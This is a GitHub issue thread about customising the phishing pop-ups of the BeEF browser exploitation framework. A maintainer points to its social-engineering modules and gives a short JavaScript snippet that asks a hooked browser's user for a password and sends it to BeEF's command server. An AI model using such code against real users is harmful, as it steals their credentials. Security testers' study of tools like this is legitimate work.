### ISSUE TITLE
Phishing Pop-ups are so old!

### ISSUE THREAD

**Issue by ratul3123** [beefproject/beef#1944]
Actually I loved the way **BeEF** works. But there are things to be noticed. I think the Phishing pop-ups(like Facebook,Gmail) on hooked browsers is too **old** for phishing in a wise way. Is there any way to change the look of phishing pop-ups?

**Comment by bcoles** [comment]
Unfortunately, no, they aren't customizable beyond the logo. However, BeEF modules are mostly JavaScript - you can fairly easily add your own.

**Comment by ratul3123** [comment]
What do you mean by "you can fairly easily add your own" ? Can I create my own new pop-ups using JavaScript?

**Comment by bcoles** [comment]
> What do you mean by "you can fairly easily add your own" ?

BeEF is a framework for developing client side attacks, with browser detection features, command and control features (xhr/websockets) to interact with the client, and a client side [API](https://github.com/beefproject/beef/wiki/Javascript-API) (+ libraries such as jQuery and BlockUI).

BeEF includes a huge amount of existing functionality, but due to the ever changing nature of everything web (modern web browsers, web technology, websites, ...) and ever changing popularity of different client-side attacks, the existing functionality quickly becomes dated or gets patched.

> Can I create my own new pop-ups using JavaScript?

Yes! BeEF modules are almost entirely written in JavaScript. If you can write JavaScript, you can write BeEF modules.

Unfortunately, the documentation is also a bit out of date. However, a good place to start is the [Module Creation Steps](https://github.com/beefproject/beef/wiki/Module-Creation-Steps) page on the wiki. I also recommend taking a look at some of the existing modules for example code and inspiration:

* https://github.com/beefproject/beef/tree/master/modules/social_engineering
  * https://github.com/beefproject/beef/tree/master/modules/social_engineering/pretty_theft
  * https://github.com/beefproject/beef/tree/master/modules/social_engineering/gmail_phishing
* https://github.com/beefproject/beef/blob/master/modules/misc/blockui/command.js

It may take some time to learn your way around the API, but the existing modules should help as examples. Also, you don't strictly need to use the API (and jQuery is available). All you really need is `beef.net.send` to retrieve whatever data the user provided:

```javascript
var my_phished_creds = prompt("yo give me your password");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=' + my_phished_creds );
```

**Comment by ratul3123** [comment]
Thank you for your time & advice.
